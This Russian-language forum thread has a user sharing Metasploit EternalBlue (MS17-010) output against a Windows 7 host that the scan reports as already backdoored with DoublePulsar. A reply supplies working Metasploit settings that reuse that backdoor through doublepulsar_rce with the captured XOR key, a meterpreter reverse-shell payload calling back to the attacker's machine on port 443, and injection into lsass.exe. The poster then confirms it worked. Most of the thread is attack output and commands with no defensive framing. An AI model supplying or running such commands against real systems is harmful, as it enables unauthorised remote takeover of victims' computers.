нужна помощь с eternalblue

DarkDoom

Null
Пользователь
Регистрация
10 Дек 2025
Сообщения
2
Реакции
0
Всем привет. Может, найдутся знающие. Есть тачка с MS17‑010. Запускаю ms17_010_eternalblue - модуль находит уязвимость, пишет, что всё ок, но в конце стабильно сыплет FAIL.
Уже пробовал несколько раз — без изменений. Что это может значить?


Код:
[!] 172.xxxxxxxxxxxxxxxx - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x94182DC1

[] 172.xxxxxxxxxxx - Scanned 1 of 1 hosts (100% complete) [+] 172.xxxxxxxxxx - The target is vulnerable. []

 172.xxxxxxxxx - Connecting to target for exploitation. [+] 172xxxxxxxxxxxx - Connection established for exploitation.

[+] 172.xxxxxxxxxxx - Target OS selected valid for OS indicated by SMB reply []

 172.xxxxxxxxxx - CORE raw buffer dump (42 bytes) [] 172.xxxxxxxxxxxx - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes []

172.xxxxxxxxxx - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv []

 172.xxxxxxxxx - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 172.xxxxxxxxxxxx - Target arch selected valid for arch indicated by DCE/RPC reply []

172.xxxxxxxxxx - Trying exploit with 12 Groom Allocations. []

172xxxxxxxxxx - Sending all but last fragment of exploit packet []

172.xxxxxxxxx - Starting non-paged pool grooming [+] 172.xxxxxxxxxxx - Sending SMBv2 buffers [+] 172.xxxxxxxxxx - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. []

172.xxxxxxxxx - Sending final SMBv2 buffers. []

172.xxxxxxxxxx - Sending last fragment of exploit packet! [] 172.16.100.2:445 - Receiving response from exploit packet [+] 172.xxxxxxxxx - ETERNALBLUE overwrite completed successfully (0xC000000D)!

[] 172.xxxxxxxxx - Sending egg to corrupted connection. []

172.xxxxxxxxxxx - Triggering free of corrupted buffer. [-] 172.xxxxxxxxx

- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 172.xxxxxxxxxxx - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 172.16.100.2:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= []
За ранее спасибо за любую помощь.
 
Когда пытаешься сесть в кузов, а там уже всё занято
EternalBlue: “Ну всё, приехали!” :LOL:
Зачем ломать дверь, если она уже открыта? На системе есть работающий бэкдор DoublePulsar.
Юзай doublepulsar_rce, ключик 0x94182DC1 тебе в помощь.

Ломаем ломаное:
set RHOSTS 172.0.0.0
set PAYLOAD windows/x64/meterpreter/любой который тебе нужен
set LHOST <IP_твоего_Windows_10>
set LPORT 443
set PROCESS_INJECT lsass.exe
set DOUBLEPULSAR_PATH 0x94182DC1
run или exploit как по кайфу )
 
Спасибо сработало)
 
Сверху